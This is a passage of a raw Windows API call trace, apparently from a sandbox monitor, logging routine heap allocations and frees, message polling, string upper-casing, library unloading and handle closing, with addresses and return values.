hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0267.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0267.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.905] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0267.905] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.905] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.905] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.906] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.906] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.906] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0267.907] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.907] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.908] FreeLibrary (hLibModule=0x74d40000) returned 1 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.908] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.908] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0267.908] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0267.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.910] CloseHandle (hObject=0x268) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.910] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.911] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.911] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.911] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d50 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa050 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c78 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0267.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0267.912] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.912] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.912] CloseHandle (hObject=0x2c8) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.921] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0267.922] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0267.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0267.922] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0267.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0267.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0267.924] HeapFree (in: 